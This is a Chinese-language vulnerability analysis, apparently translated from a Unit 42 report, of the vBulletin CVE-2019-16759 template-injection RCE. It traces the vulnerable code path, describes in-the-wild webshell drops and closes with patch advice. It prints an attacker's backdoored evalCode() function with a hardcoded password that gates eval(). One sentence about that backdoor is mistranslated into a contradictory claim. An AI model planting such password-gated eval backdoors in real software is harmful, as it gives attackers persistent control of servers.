研究人员发现vBulletin Pre-Auth漏洞的在野利用。
近期有研究人员公布了CVE-2019-16759 vBulletin 0 day漏洞的相关详情,Unit 42很快就发现了该漏洞的在野利用。通过利用该漏洞,未经过认证的攻击者可以获取运行在v 5.0.0- 5.5.4版本的vBulletin服务器的特权访问和控制。
漏洞根源分析
该漏洞是一个pre-auth(预认证)远程代码执行漏洞,CVSS V3.1评分为9.8。漏洞是vBulletin v 5.0.0版本中引入的一个Ajax渲染函数引发的PHP服务器端模板注入。
首先看一下index.php
的代码。
图 1. 漏洞的入口点(index.php)
代码会调用vB5_Frontend_ApplicationLight::isQuickRoute()
来检查请求是不是quick route
(快速路由)。使用的方法是位于includes/vb5/frontend/applicationlight.php
的isQuickRoute()
:
图 2. isQuickRoute函数 (includes/vb5/frontend/applicationlight.php
)
如图 2所示,如果在请求的开始部分有 ajax/api
或ajax/render
,函数会返回true
。然后,vB5_Frontend_ApplicationLight
对象会被初始化,并根据图1执行。
图 3. Ajax render handler (includes/vb5/frontend/applicationlight.php
)
图 3所示,当请求以ajax/render
开始时,handler
会被设置为callRender
。
图 4. callRender() 渲染模板 (includes/vb5/frontend/applicationlight.php
)
图 4表明callRender()
函数会使用来自array_merge($_POST, $GET)
的$routeInfo[2]
和$params
中的名字来渲染模板。
图 5. widget_php
模板 (core/install/vbulletin-style.xml
)
图 5表明vbulletin-style.xml
文件中有一个widget_php
模板。根据该模板,如果$widgetConfig[‘code’]
不为空, $vboptions[‘disable_php_rendering’]
也被禁用了,就会执行如下代码:
{vb:action evaledPHP, bbcode, evalCode, {vb:raw
widgetConfig.code}}
{vb:raw $evaledPHP}
图 6. evalCode()函数 (includes/vb5/frontend/controller/bbcode.php)
图 6所示是evalCode()
函数的代码,$code
中的文本会直接由于PHPeval()
函数执行。
如果用params
参数构建请求:
POC
根据分析,研究人员构建了漏洞利用代码来执行该功能。因为参数routestring
是来自$_REQUEST
的,所以可以通过$_GET
, $_POST
,$_COOKIE HTTP
等方法发送。widgetConfig[code]
可以通过$_GET, $_POST
方法发送。因此,可以构建如下的PoC,并通过GET或POST请求发送:
图 7. 通过GET请求证明漏洞
图 7 表明PoC通过GET请求发送时间运行了phpinfo()
。
图 8. 通过POST请求实现PoC
图 8表明PoC通过POST请求发送时显示的phpinfo()
。
在野漏洞利用
研究人员已经检测到多个该漏洞的在野利用尝试。
如图9所示,攻击者尝试执行die(@md5(HellovBulletin))
来确定服务器是否有漏洞,但是由于请求中多个一个=
(等号),所以漏洞利用就失败了。
图 9. 失败漏洞利用的POST请求示例
图 10表明攻击者尝试在web root目录中创建webconfig.txt.php
。
图 10. 尝试通过POST请求修改webconfig.txt.php
的漏洞利用
图 11表明webconfig.txt.php
的内容和一个一行的PHP webshell,允许攻击者来发送任意命令或由主机执行。
图 11. base64解码后的内容
图 12攻击者尝试覆写bbcode.php
文件的例子。
图 12. 攻击者尝试覆写bbcode.php
文件
如果成功的话,evalCode()
就会返回以下代码:
function evalCode($code)
{
ob_start();if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code);}
$output = ob_get_contents();
ob_end_clean();
return $output;
}
通过以上内容,在“epass”
通过请求中的值 “2dmfrb28nu3c6s9j”
发送时,被黑的站点会执行evalCode()
函数的代码。这样可以防止攻击者控制被黑的站点,允许僵尸网络C2服务器将该漏洞利用排除在外,并向目标服务器发送命令。
结论
截至目前,研究人员已经发现了该 vBulletin 漏洞的漏洞利用。
研究人员建议管理员尽快更新 vBulletin到version 5.5.2/3/4 Patch Level 1 ,或在管理面板中禁用PHP, Static HTML, Ad Module rendering
设置。